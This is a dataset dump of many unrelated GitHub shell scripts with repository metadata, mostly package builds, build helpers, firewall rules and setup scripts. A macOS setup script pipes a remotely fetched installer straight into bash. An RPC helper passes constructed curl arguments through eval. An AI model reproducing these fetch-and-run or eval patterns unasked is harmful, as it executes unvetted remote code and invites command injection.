blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
6e6d9f7e0d17b6827b92cfe49420bc3757170261
|
Shell
|
stjordanis/avalanche-cli
|
/cli/rpc/post.sh
|
UTF-8
| 1,512
| 3.15625
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
###############################################################################
function rpc_post {
local mime="${3-content-type:application/json}" ;
local args="--url '${1}' --header '${mime}'" ;
if [ -n "$AVAX_AUTH_HEADER" ] ; then
args="${args} --header 'authorization:${AVAX_AUTH_HEADER}' --data '${2}'" ;
else
args="${args} --data '${2}'" ;
fi
if (( ${#AVAX_ARGS_RPC} > 0 )) ; then
args="${args} ${AVAX_ARGS_RPC[*]}" ;
fi
if [ "$AVAX_SILENT_RPC" == "1" ] ; then
args="${args} --silent" ;
fi
if [ "$AVAX_VERBOSE_RPC" == "1" ] ; then
args="${args} --verbose" ;
fi
if [ "$AVAX_YES_RUN_RPC" != "1" ] ; then
if [ "$AVAX_DEBUG_RPC" != "1" ] ; then
printf '%s %s\n' "curl" "${args}" \
| sed 's/"password":"[^"]*"/"password":"…"/g' ;
else
printf '%s %s\n' "curl" "${args}" ;
fi
else
if [ -n "$AVAX_PIPE_RPC" ] ; then
eval "$AVAX_PIPE_RPC" ;
fi
if [ -n "${AVAX_PIPE_RPC[*]}" ] ; then
if [ -n "${AVAX_PIPE_RPC[$mime]}" ] ; then
eval curl "${args}" | ${AVAX_PIPE_RPC[$mime]} ;
else
eval curl "${args}" ;
fi
else
eval curl "${args}" ;
fi
fi
}
###############################################################################
###############################################################################
| true
|
1ce5acf384c7a16da2b5eeb01473c7a21180512d
|
Shell
|
mp15/npg_conda
|
/recipes/nanopolish/0.8.5/build.sh
|
UTF-8
| 287
| 2.59375
| 3
|
[] |
no_license
|
#!/bin/sh
set -e
git submodule update --init --recursive
make EIGEN=noinstall HDF5=noinstall HTS=noinstall CXXFLAGS="-I$PREFIX/include -I$PREFIX/include/eigen3" LDFLAGS="-L$PREFIX/lib"
# There is no install target in the Makefile
mkdir -p "$PREFIX/bin"
cp nanopolish "$PREFIX/bin/"
| true
|
69038ff51fd139a365cd4fb29e500d4a238d4f8c
|
Shell
|
shuuuuun/static-website-cfn
|
/bin/cfn-cancel
|
UTF-8
| 183
| 2.546875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
set -eu
ROOT_PATH="$(cd "$(dirname $0)/../"; pwd)"
source "$ROOT_PATH/env"
aws cloudformation cancel-update-stack \
--profile $AWS_PROFILE \
--stack-name $STACK_NAME
| true
|
f9078ce9667f157e17ff1610bfcc99ca4329b7e0
|
Shell
|
AkBKukU/MinecraftServerSuite
|
/webScrapingTest.sh
|
UTF-8
| 225
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# webDataParsing
# Reads web pages to get cersion numbers and download links
if [ -f './webDataParsing.sh' ]
then
source ./webDataParsing.sh
fi
serverType="vanilla"
echo "$(getNewestVersion): $(getNewLink)"
| true
|
762d470947148647bde6f33a230dd48286a94c64
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/edb-debugger-git/PKGBUILD
|
UTF-8
| 1,726
| 2.859375
| 3
|
[] |
no_license
|
# Maintainer: maz_1 <ohmygod19993 at gmail dot com>
_pkgname=edb-debugger
pkgname=$_pkgname-git
pkgver=r906.863ea6a
pkgrel=1
pkgdesc="EDB (Evan's Debugger) is a binary mode debugger with the goal of having usability on par with OllyDbg. Git version"
arch=('i686' 'x86_64')
url='http://www.codef00.com/projects#debugger'
license=('GPL2')
depends=('qt5-base' 'capstone' 'qt5-xmlpatterns')
makedepends=('boost>=1.35.0')
install=edb.install
source=("git+https://github.com/eteran/edb-debugger.git"
"git+https://github.com/eteran/qhexview.git"
'edb.desktop')
md5sums=('SKIP'
'SKIP'
'8844cd95efef848f8f4a444259491961')
pkgver() {
cd $_pkgname
if git_version=$( git describe --long --tags 2>/dev/null ); then
IFS='-' read last_tag tag_rev commit <<< "$git_version"
printf '%s.r%s.%s' "$last_tag" "$tag_rev" "$commit"
else
printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
fi
}
prepare() {
cd $_pkgname/src
git submodule init qhexview
git config submodule.qhexview.url ../../qhexview
git submodule update qhexview
}
build() {
cd $_pkgname
sed -i "s:/usr/local:/usr:g" common.pri
qmake-qt5 -makefile DEFAULT_PLUGIN_PATH="/usr/lib/edb/"
make
}
package() {
cd $_pkgname
# install to pkg dir
make INSTALL_ROOT="$pkgdir" install
# correct /usr/lib64 -> /usr/lib on x86_64
[ "$CARCH" = "x86_64" ] && (mv "$pkgdir/usr/lib64" "$pkgdir/usr/lib")
# icons
install -Dm644 src/images/edb48-logo.png "$pkgdir/usr/share/pixmaps/edb.png"
install -Dm644 src/images/edb48-logo.png "$pkgdir/usr/share/icons/hicolor/48x48/apps/edb.png"
# install desktop file
cd ..
install -Dm644 edb.desktop "$pkgdir/usr/share/applications/edb.desktop"
}
| true
|
3eee75f6875d40ea71947c7f65a433eaa57e115f
|
Shell
|
benranco/docs
|
/scripts/extractOnlySeqIdsFromFastaFiles.sh
|
UTF-8
| 763
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
echo "extractOnlySeqIdsFromFastaFiles.sh"
###########################################
# Editable parameters
inFolder="."
outFolder="."
# make sure the input file naming conventions match this and are consistent for all files
inFilenameEnd=".fasta"
outFilenamePrefix="seqIds_"
###########################################
# Execution code
for f in $(ls $inFolder | grep $inFilenameEnd"$")
do
# extract all seq ids from the .fasta file. The grep -oE option only prints the segment of the matching lines that contains the matching string (\S matches any non-whitespace charcter). The sed command replaces all occurences of ">" with "".
echo "Processing $f."
grep -oE "^>\S*" $inFolder/$f | sed 's/>//g' > $outFolder/$outFilenamePrefix$f
done
| true
|
4ea22ca9dbdb6febed91b902a9490c49196f9ea4
|
Shell
|
kevinmao/fcc-nnc
|
/viz/topwords.sh
|
UTF-8
| 483
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# global vars
source ../config.sh
mkdir -p ${Report_Data}
#######################################
# calculate word counts for top5 topics
#######################################
Data="${Mallet_Data}/unigram/20"
doc_topics="${Data}/infer.doc_topics.txt"
topic_keys="${Data}/topic_keys.txt"
word_topic_counts="${Data}/word_topic_counts.txt"
output=${Report_Data}/topwords.txt
python words4Topics.py -d ${doc_topics} -t ${topic_keys} -w ${word_topic_counts} > ${output}
| true
|
ef279164b583ca393a962c183fce506331b03c84
|
Shell
|
mohancggrl/nandha
|
/sh.sh
|
UTF-8
| 964
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
wsp="/tmp/nandha"
dt="/tmp/mohan"
cd $wsp
env1="$wsp/db/package/ec20.5/prod"
env2="$wsp/db/package/ec20.5/preprod"
env3="$wsp/db/package/ec20.5/qa"
env4="$wsp/db/package/ec20.5/uat"
mkdir -p $wsp/db/package/ec20.5/{prod,preprod,uat,qa}
#chown -R jenkins:jenkins $wsp/package/*
chmod -R 777 $wsp/db/package/*
list=`ls /tmp/mohan/`
for filename in $list;
do
IFS='-' read -ra ADDR <<< "$filename"
a=${ADDR[-1]}
IFS='.' read -ra AD <<< "$a"
b=${AD[0]}
# for pr in $b;
#echo $b
if [ "$b" == "prod" ];
then
#echo $filename 1
mv $dt/$filename $env1
elif [ "$b" == "prepod" ];
then
#echo $filename 2
mv $dt/$filename $env2
elif [ "$b" == "qc" ];
then
#echo $filename 3
mv $dt/$filename $env3
elif [ "$b" == "uat" ];
then
#echo $filename 4
mv $dt/$filename $env4
else
#echo $filename 5
#cp -f $dt/$filename {$env1,$env2,$env3,$env4}
xargs -n 1 cp -v $dt/$filename<<<"$env1 $env2 $env3 $env4"
mv
fi
done
| true
|
7ac20109ae3b2a7b0e60c012445770a383c07890
|
Shell
|
ReadMoa/web-service
|
/tools/serving/update_serving_data.sh
|
UTF-8
| 651
| 3.390625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# Should execute under the root directory (web-service)
# $ ./tools/serving/update_serving_data.sh test
echo "----------------------------------------------"
echo "START updating serving storage"
echo "----------------------------------------------"
START=$(date +%s)
# Take the first argument as 'mode'
mode=$1
# Run the command.
PYTHONPATH=./ python3 tools/serving/update_serving_data.py --mode=$mode
END=$(date +%s)
DIFF=$(echo "$END - $START" | bc)
echo "----------------------------------------------"
echo "COMPLETED updating serving storage (time passed: $DIFF seconds)"
echo "----------------------------------------------"
| true
|
a3353368b4774ace7205b5ae5a3298f0d5ba63f3
|
Shell
|
KaOSx/main
|
/python3-pygments/PKGBUILD
|
UTF-8
| 727
| 2.6875
| 3
|
[] |
no_license
|
pkgname=python3-pygments
pkgver=2.16.1
pkgrel=1
pkgdesc="Python syntax highlighter"
arch=('x86_64')
url="https://pygments.org/"
license=('BSD')
depends=('python3')
makedepends=('python3-build' 'python3-installer' 'python3-setuptools' 'python3-wheel')
source=("https://pypi.org/packages/source/P/Pygments/Pygments-${pkgver}.tar.gz")
sha256sums=('1daff0494820c69bc8941e407aa20f577374ee88364ee10a98fdbe0aece96e29')
build() {
cd Pygments-${pkgver}
python3 -m build -nw
}
package() {
cd Pygments-${pkgver}
python3 -m installer --destdir=${pkgdir} dist/*.whl
install -Dm644 external/pygments.bashcomp ${pkgdir}/etc/bash_completion.d/pygments
install -Dm644 LICENSE ${pkgdir}/usr/share/licenses/${pkgname}/LICENSE
}
| true
|
e28822f384e0fc0d02ebad0632c81a08f24d1096
|
Shell
|
heavysink/repo
|
/archlinuxcn/gtk3-no-tracker/PKGBUILD
|
UTF-8
| 2,886
| 2.640625
| 3
|
[] |
no_license
|
# Maintainer: Jan Alexander Steffens (heftig) <heftig@archlinux.org>
# Contributor: Ionut Biru <ibiru@archlinux.org>
pkgbase=gtk3-no-tracker
pkgname=(gtk3-no-tracker)
pkgver=3.24.33
pkgrel=1
epoch=1
pkgdesc="GObject-based multi-platform GUI toolkit"
arch=(x86_64)
url="https://www.gtk.org/"
depends=(atk cairo libxcursor libxinerama libxrandr libxi libepoxy gdk-pixbuf2
dconf libxcomposite libxdamage pango shared-mime-info at-spi2-atk
wayland libxkbcommon adwaita-icon-theme json-glib librsvg
desktop-file-utils mesa cantarell-fonts libcolord rest libcups
fribidi iso-codes libcloudproviders gtk-update-icon-cache)
makedepends=(gobject-introspection gtk-doc git glib2-docs sassc meson
wayland-protocols)
license=(LGPL)
_commit=8ff9b2f83ff491cbfcbf9b30c706bd917679e7cc # tags/3.24.33^0
source=("git+https://gitlab.gnome.org/GNOME/gtk.git#commit=$_commit"
gtk-query-immodules-3.0.hook)
sha256sums=('SKIP'
'a0319b6795410f06d38de1e8695a9bf9636ff2169f40701671580e60a108e229')
pkgver() {
cd gtk
git describe --tags | sed 's/[^-]*-g/r&/;s/-/+/g'
}
prepare() {
cd gtk
}
build() {
CFLAGS+=" -DG_DISABLE_CAST_CHECKS"
local meson_options=(
-D broadway_backend=true
-D cloudproviders=true
-D tracker3=false
-D colord=yes
-D gtk_doc=false
-D man=true
)
arch-meson gtk build "${meson_options[@]}"
meson compile -C build
}
_pick() {
local p="$1" f d; shift
for f; do
d="$srcdir/$p/${f#$pkgdir/}"
mkdir -p "$(dirname "$d")"
mv "$f" "$d"
rmdir -p --ignore-fail-on-non-empty "$(dirname "$f")"
done
}
package_gtk3-no-tracker() {
optdepends=('evince: Default print preview command')
provides=(gtk3-print-backends libgtk-3.so libgdk-3.so libgailutil-3.so gtk3=$pkgver)
conflicts=(gtk3-print-backends gtk3)
replaces=("gtk3-print-backends<=3.22.26-1")
install=gtk3.install
meson install -C build --destdir "$pkgdir"
install -Dm644 /dev/stdin "$pkgdir/usr/share/gtk-3.0/settings.ini" <<END
[Settings]
gtk-icon-theme-name = Adwaita
gtk-theme-name = Adwaita
gtk-font-name = Cantarell 11
END
install -Dt "$pkgdir/usr/share/libalpm/hooks" -m644 gtk-query-immodules-3.0.hook
cd "$pkgdir"
rm usr/bin/gtk-update-icon-cache
rm usr/share/man/man1/gtk-update-icon-cache.1
_pick demo usr/bin/gtk3-{demo,demo-application,icon-browser,widget-factory}
_pick demo usr/share/applications/gtk3-{demo,icon-browser,widget-factory}.desktop
_pick demo usr/share/glib-2.0/schemas/org.gtk.{Demo,exampleapp}.gschema.xml
_pick demo usr/share/icons/hicolor/*/apps/gtk3-{demo,widget-factory}[-.]*
_pick demo usr/share/man/man1/gtk3-{demo,demo-application,icon-browser,widget-factory}.1
}
package_gtk3-docs() {
pkgdesc+=" (documentation)"
depends=()
mv docs/* "$pkgdir"
}
package_gtk3-demos() {
pkgdesc+=" (demo applications)"
depends=(gtk3)
mv demo/* "$pkgdir"
}
# vim:set ts=2 sw=2 et:
| true
|
e1c72fef32e827e0101aa0e3421ae44628e7892b
|
Shell
|
TheRealXG/Calculator
|
/docker/static_analysis/usr/tmp/start.sh
|
UTF-8
| 183
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
if [ -z "$SRC_VOL" ]; then
export SRC_VOL="/volume"
fi
chmod +x $SRC_VOL/testScripts/start_static_analysis.sh
cd $SRC_VOL
$SRC_VOL/testScripts/start_static_analysis.sh
| true
|
f96d076eb5e9d8549efbae78d11f67729dda2bc1
|
Shell
|
TakehiroTada/hub-projects-collection-script
|
/hub-projects-collection-script.sh
|
UTF-8
| 938
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash
# 環境変数
# リポジトリのデータセット
REPOSITORY_LIST='./sample_dataset.csv'
# 作業ディレクトリ
WORKING_DIR='/home/take/develop/hub-projects-collection-script'
cd $WORKING_DIR
i=1
while read row; do
USERNAME=`echo ${row} | cut -d , -f 12`
REPO_NAME=`echo ${row} | cut -d , -f 4`
REPO_URI="https://github.com/${USERNAME}/${REPO_NAME}"
echo $REPO_URI
git clone $REPO_URI
if [ -d $REPO_URI ];then
echo "Repository exists."
cd $REPO_NAME
git checkout master
git pull
FILE_LIST=("README.md" "readme.md" "README.MD" "readme.MD" "readme.rst" "README.RST" "README.rst")
j=0
for FILE in ${FILE_LIST[@]}; do
if [ -e $FILE ]; then
echo $FILE
echo "File exists."
cp $FILE "../tmp/${i}_${REPO_NAME}_${FILE}"
fi
let j++
done
rm -r "./${REPO_NAME}"
fi
cd $WORKING_DIR
i=`expr $i + 1`
done < $REPOSITORY_LIST
| true
|
72925a13fcfef65513a9aa9c6add2db44cb3d082
|
Shell
|
fredcollman/dotfiles
|
/bin/hotfix-done.sh
|
UTF-8
| 372
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/sh
set -e
hotfix_done() {
MASTER_BRANCH=`git config --get gitflow.branch.master`
DEV_BRANCH=`git config --get gitflow.branch.develop`
HF_BRANCH="hotfix/$1"
git checkout $MASTER_BRANCH && \
git merge --no-ff $HF_BRANCH && \
git checkout $DEV_BRANCH && \
git merge --no-ff $HF_BRANCH && \
git branch -d $HF_BRANCH
}
hotfix_done $@
| true
|
7d5c843931036d7d7ab9d7427fbc5d86eab5ae43
|
Shell
|
diggzhang/shangzuoautorobot
|
/userAttrClass.sh
|
UTF-8
| 756
| 2.71875
| 3
|
[] |
no_license
|
YEAR=(`date -d -0day '+%Y'`)
MONTH=(`date -d -0day '+%m'`)
DAY=(`date -d -0day '+%d'`)
MONGOINSTANCE="time mongo --quiet --host 10.8.8.111 onions"
echo "++++++++++++++++++++++++++"
date
echo "daily update user atrribute"
echo "running dim_user"
$MONGOINSTANCE ./dim_user.js > data_dim_user_$YEAR$MONTH$DAY.csv
echo "running user_school"
$MONGOINSTANCE ./user_school.js > data_user_school_$YEAR$MONTH$DAY.csv
echo "running dim_rooms"
$MONGOINSTANCE ./dim_rooms.js > data_dim_rooms_$YEAR$MONTH$DAY.csv
echo "running dim_circles"
$MONGOINSTANCE ./dim_circles.js > data_dim_circles_$YEAR$MONTH$DAY.csv
echo "compress all csv"
mv *.csv ./data
7za a daily_user_attr_csv_$YEAR$MONTH$DAY.7z ./data/*
rm ./data/*.csv
date
echo "--------------------------"
| true
|
cb95ae97de9a5d709f646f7a3b33fd80289f9731
|
Shell
|
dymaxionlabs/satlomas-exp
|
/script/predict_rf_all.sh
|
UTF-8
| 2,401
| 3.390625
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
set -xeu -o pipefail
function superimpose {
otbcli_Superimpose \
-inr $dataset_dir/$2.tif \
-inm $dataset_dir/$1.tif \
-out $results_dir/feats/$1.tif
}
function extract_all_features {
for band in $(seq 1 8); do
extract_local_stats s2_10m $band
extract_haralick s2_10m $band
done
for band in $(seq 1 6); do
extract_local_stats s2_20m $band
extract_haralick s2_20m $band
done
for band in $(seq 1 3); do
extract_local_stats s1 $band
extract_haralick s1 $band
done
extract_local_stats srtm 1
extract_haralick srtm 1
}
function extract_local_stats {
otbcli_LocalStatisticExtraction \
-in $results_dir/feats/$1.tif \
-channel $2 \
-radius 3 \
-out $results_dir/feats/local_stats_$1_$2.tif
}
function extract_haralick {
otbcli_HaralickTextureExtraction \
-in $results_dir/feats/$1.tif \
-channel $2 \
-texture simple \
-parameters.min 0 \
-parameters.max 0.3 \
-out $results_dir/feats/haralick_$1_$2.tif
}
function concatenate_images {
current_dir=$(pwd)
cd $results_dir/feats
otbcli_ConcatenateImages \
-il $(ls) \
-out $results_dir/features.tif
cd $current_dir
}
function classify_image {
otbcli_ImageClassifier \
-in $results_dir/features.tif \
-model data/results/rf_model.yaml \
-out $results_dir/cover.tif
}
function post_process_result {
script/post_process_sen.sh $results_dir/cover.tif $results_dir/cover.geojson
}
function predict_set {
date_ranges=$1
for date_range in $date_ranges; do
dataset_dir=~/satlomas-exp/data/images/full/$date_range
results_dir=~/satlomas-exp/data/results/full/$date_range
if [ ! -f "$results_dir/cover.tif" ]; then
mkdir -p $results_dir/feats
# Copy S2 10m image to feats/
cp $dataset_dir/s2_10m.tif $results_dir/feats/s2_10m.tif
# Superimpose the other images in reference to S2 10m image
superimpose s2_20m s2_10m
superimpose s1 s2_10m
superimpose srtm s2_10m
extract_all_features
concatenate_images
classify_image
fi
if [ ! -f "$results_dir/cover.geojson" ]; then
post_process_result
fi
done
}
predict_set "201811_201812 201901_201902 201903_201904 201905_201906 201907_201908 201909_201910"
| true
|
e0e54eedd4f54eeb6641ef3863ec5289ff437af7
|
Shell
|
johmathe/slack
|
/roles/bach_svn/scripts/postinstall
|
UTF-8
| 512
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
SVN_ROOT=/home/svn
a2enmod ssl dav_svn
cp /usr/share/doc/libapache2-mod-svn/examples/svnindex.xsl /var/www/
chown root.www-data /var/www/svnindex.xsl
chmod g+r /var/www/svnindex.xsl
[ -d $SVN_ROOT ] && echo "$SVN_ROOT already exists, aborting." && exit 1;
addgroup svnadm
mkdir /home/svn
chgrp svnadm /home/svn
chmod 2770 /home/svn
setfacl -d -m g:www-data:rwx /home/svn
setfacl -m g:www-data:rwx /home/svn
chmod 755 /usr/local/bin/svnnew
chmod 755 /usr/local/bin/svndel
service apache2 restart
| true
|
26437c21e941d4f1b5be1bc1161a16d5d638a72a
|
Shell
|
smklancher/ANE-Android-Install-Tracking
|
/Build/buildANE/buildANE.sh
|
UTF-8
| 860
| 2.625
| 3
|
[] |
no_license
|
adt="/Applications/Adobe Flash Builder 4.7/eclipse/plugins/com.adobe.flash.compiler_4.7.0.349722/AIRSDK/bin/adt"
nativedir="/Users/markhood/Documents/Eclipse64/ANESample_java"
echo "********************************************************************"
echo " - creating ANE package"
rm -rf Android-ARM/*
rm -f SampleASExtension.ane library.swf
mkdir -p Android-ARM
unzip ../ANESample/bin/ANESample.swc library.swf
cp library.swf Android-ARM
cp "$nativedir"/ANESample.jar Android-ARM
cp -r "$nativedir"/res Android-ARM
"$adt" -package -target ane SampleASExtension.ane extension.xml -swc ../ANESample/bin/ANESample.swc -platform Android-ARM -C Android-ARM .
#"$adt" -package -storetype PKCS12 -keystore cer.p12 -storepass password -target ane SampleASExtension.ane extension.xml -swc ../ANESample/bin/ANESample.swc -platform Android-ARM -C Android-ARM .
| true
|
f641d1e570f01f35332d731481756de55f2dbd60
|
Shell
|
bol-van/zapret
|
/init.d/macos/zapret
|
UTF-8
| 915
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/sh
EXEDIR="$(dirname "$0")"
ZAPRET_BASE="$EXEDIR/../.."
ZAPRET_BASE="$(cd "$ZAPRET_BASE"; pwd)"
. "$EXEDIR/functions"
case "$1" in
start)
zapret_run_daemons
[ "$INIT_APPLY_FW" != "1" ] || zapret_apply_firewall
;;
stop)
[ "$INIT_APPLY_FW" != "1" ] || zapret_unapply_firewall
zapret_stop_daemons
;;
restart)
"$0" stop
"$0" start
;;
start-fw|start_fw)
zapret_apply_firewall
;;
stop-fw|stop_fw)
zapret_unapply_firewall
;;
restart-fw|stop_fw)
zapret_restart_firewall
;;
reload-fw-tables|reload_fw_tables)
pf_table_reload
;;
start-daemons|start_daemons)
zapret_run_daemons
;;
stop-daemons|stop_daemons)
zapret_stop_daemons
;;
restart-daemons|restart_daemons)
zapret_restart_daemons
;;
*)
N="$SCRIPT/$NAME"
echo "Usage: $N {start|stop|start-fw|stop-fw|restart-fw|reload-fw-tables|start-daemons|stop-daemons|restart-daemons}" >&2
exit 1
;;
esac
| true
|
73eed1c027dba9f2e3da0b91ca654eb8c3ebc0f7
|
Shell
|
PandikKumar/dell-devops
|
/ci-scripts/test/unit/pingfederate/configure-delegated-admin/03-idp-adapter-mapping-tests.sh
|
UTF-8
| 1,009
| 2.96875
| 3
|
[] |
no_license
|
#!/bin/bash
# Source the script we're testing
# Suppress env vars noise in the test output
. "${HOOKS_DIR}"/utils.lib.sh > /dev/null
. "${HOOKS_DIR}"/util/configure-delegated-admin-utils.sh > /dev/null
# Mock up get_idp_adapter_mapping, 404 will cause code to create new IDP adapter mapping.
get_idp_adapter_mapping() {
export DA_IDP_ADAPTER_MAPPING_RESPONSE="HTTP status code: 404"
}
testSadPathCreateIdpMapping() {
# Mock up make_api_request as a failure.
# When calling set_idp_adapter_mapping function, its
# expected to fail when make_api_request fails to create idp adapter mapping.
make_api_request() {
return 1
}
set_idp_adapter_mapping > /dev/null 2>&1
exit_code=$?
assertEquals 1 ${exit_code}
}
testHappyPathCreateIdpMapping() {
# Mock up make_api_request as a success for creating idp adapter mapping.
make_api_request() {
return 0
}
set_idp_adapter_mapping > /dev/null 2>&1
exit_code=$?
assertEquals 0 ${exit_code}
}
# load shunit
. ${SHUNIT_PATH}
| true
|
b6b5ab9063566430a75c44fa5f2fd92e55fb5551
|
Shell
|
nicrip/moos-ivp-rypkema
|
/clean.sh
|
UTF-8
| 693
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
#--- simple clean script ---#
#remove all files in build directory
rm -rf ./build/*
#remove all files in lib directory
rm -rf ./lib/*
#remove all files in bin directory (except for original binaries)
find ./bin/ -mindepth 1 ! -name "MOOSup.py" ! -name "MyGenMOOSApp" ! -name "README_MOOSup.py" -delete
#remove all MOOSLog* folders
find ./ -mindepth 1 -name "MOOSLog*" -type d -exec rm -rfv {} \;
#remove all Log* folders
find ./ -mindepth 1 -name "LOG*" -type d -exec rm -rfv {} \;
#remove all files of type .LastOpenedMOOSLogDirectory
find ./ -mindepth 1 -name "*.LastOpenedMOOSLogDirectory" -delete
#remove all files of type .moos++
find ./ -mindepth 1 -name "*.moos++" -delete
| true
|
a5dcabf8cdad56182f1bf060d42c3378d809bbc0
|
Shell
|
ryuichiueda/kaigan_shellscript
|
/201301/LOGWATCH
|
UTF-8
| 495
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash -vx
#
# LOGWATCH: 指定したホストのlogwatchメールを収集
# usage: ./LOGWATCH <hostname>
#
# written by R. Ueda (r-ueda@usp-lab.com)
[ $1 = "" ] && exit 1
server=$1
dir=/home/ueda/MAIL
dest="$dir/LOGWATCH_$server"
cd "$dir" || exit 1
mkdir -p "$dest" || exit 1
echo ????????.utf8/* |
xargs grep -F "From: logwatch@$server" |
awk -F: '{print $1,substr($1,1,8)}' |
#1:ファイル名 2:日付
awk -v d="$dest" '{print $1,d "/" $2}' |
#1:コピー元 2:コピー先
xargs -n 2 cp
| true
|
7a8e94b1abfc3e09708afcad35f86f598956e9ff
|
Shell
|
leojacoby/python
|
/shopping.py
|
UTF-8
| 1,375
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/sh
# shopping.py
#
#
# Created by Leo Jacoby on 8/21/16.
#
shopping = []
def helper():
print("""Add items to the list.
Seperate each item with a comma.
Type 'SHOW' to see your current list.
When you are done, type 'DONE' in all caps.
If you are confused about any of these comands, type 'HELP'.\n""")
def shower():
count = 1
for i in shopping:
print("{}: {}".format(count, i))
count += 1
def adder(x):
shopping.append(x)
print("You added {} to your list, which now has {} items.".format(x, len(shopping)))
helper()
while 1:
current = raw_input("> ")
if current == "DONE":
print("Here's your list:")
shower()
break
elif current == "SHOW":
shower()
continue
elif current == "HELP":
helper()
continue
else:
new = current.split(',')
try:
index = raw_input("Add this at at a certain spot? Press enter for the end of the list, or give me a number. Currently {} items in list. ".format(len(shopping)))
except ValueError:
if index:
spot = int(index) - 1
for item in new:
shopping.insert(spot, item.strip())
spot += 1
else:
for item in new:
shopping.append(item.strip())
| true
|
11b0504dd601c7b0436141f2625914d3109fc236
|
Shell
|
lobsterdore/terraform-vpn-example
|
/files/firewall-client.sh
|
UTF-8
| 991
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/sh
# Drop everything and clear rules
iptables -P OUTPUT DROP
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -F
# Drop input and forward requests by default
iptables -P OUTPUT ACCEPT
iptables -P INPUT DROP
iptables -P FORWARD DROP
# Prevent external packets from using loopback addr
iptables -A INPUT -i eth0 -s 127.0.0.1 -j DROP
iptables -A FORWARD -i eth0 -s 127.0.0.1 -j DROP
iptables -A INPUT -i eth0 -d 127.0.0.1 -j DROP
iptables -A FORWARD -i eth0 -d 127.0.0.1 -j DROP
# Loopback
iptables -A INPUT -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -d 127.0.0.1 -j ACCEPT
# Accept all via vpn
iptables -A INPUT -i tun+ -j ACCEPT
iptables -A FORWARD -i tun+ -j ACCEPT
# Keep state of connections from local machine and private subnets
iptables -A OUTPUT -m state --state NEW -o eth0 -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -m state --state NEW -o eth0 -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED
| true
|
f4c59635f14a41fcde05d353aa8ac021fbf10820
|
Shell
|
ciccalab/sysSVM
|
/raw_scripts/data_parsing.sh
|
UTF-8
| 909
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/sh
## Set the working Directorty to be the current one, i.e. where you are submitting the script
##$ -cwd
##$ -j y
## Set the SHELL type to be sh##
#$ -S /bin/sh
## Set the Parallel Environment (in this case mpi)
##$ -pe smp 1
while getopts ':s:m:i:c:t:v:g:' flag; do
case "${flag}" in
s) sample_dir="${OPTARG}" ;;
m) snvs="${OPTARG}" ;;
i) indels="${OPTARG}" ;;
c) cnvs="${OPTARG}" ;;
t) stats="${OPTARG}" ;;
##v) svs="${OPTARG}" ;;
g) genome="${OPTARG}" ;;
esac
done
echo "Sample directory: ${sample_dir}"
## CONFIGURATION
## --------------
module load general/R/3.2.1
module load bioinformatics/bedtools2/2.25.0
Rscript='/mnt/lustre/users/k1469280/mourikisa/data/OAC/data_parsing.R'
## Run script
#Rscript $Rscript ${sample_dir} ${snvs} ${indels} ${cnvs} ${stats} ${svs} ${genome}
Rscript $Rscript ${sample_dir} ${snvs} ${indels} ${cnvs} ${stats} ${genome}
| true
|
83946e550cbc15480b22159b1d2392ce5e659041
|
Shell
|
Lianathanoj/dotfiles
|
/setup/setup1_mac.sh
|
UTF-8
| 2,644
| 4.125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
###################################################################################################
# Description: This creates a local Github directory, downloads homebrew, downloads git, sets up
# git credentials, and clones my dotfiles.
# Instructions: Navigate to https://github.com/Lianathanoj/dotfiles/setup/setup1.sh, download the
# file, and run `bash setup1_mac.sh`. You'll need to intermittently type in certain
# information such as password, Github credentials, etc. We need to do this in this
# manner because some steps in setup2.sh require brew and git to be installed. This
# script tries to be idempotent in that you can run it multiple times with the same
# outcome.
###################################################################################################
# create Github directory if it doesn't already exist
GITHUB_DIR=$HOME/Github
mkdir -p $GITHUB_DIR
# download homebrew
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
grep -qF 'eval "$(/opt/homebrew/bin/brew shellenv)"' $HOME/.zprofile || echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> $HOME/.zprofile
grep -qF 'export PATH="/opt/homebrew/bin:$PATH"' $HOME/.zshrc || echo 'export PATH="/opt/homebrew/bin:$PATH"' >> $HOME/.zshrc
# download git, set up credentials, and start ssh agent
brew install git
git config --global user.name "Jonathan Lian"
git config --global user.email jonathan.lian123@gmail.com
ssh-keygen -t ed25519 -C "jonathan.lian123@gmail.com"
eval "$(ssh-agent -s)"
# create ssh config file if it doesn't already exist
SSH_CONFIG=$HOME/.ssh/config
if test -f "$SSH_CONFIG" ; then
echo "~/.ssh/config exists."
else
echo "~/.ssh/config does not exist; creating ~/.ssh/config file."
touch "$SSH_CONFIG"
fi
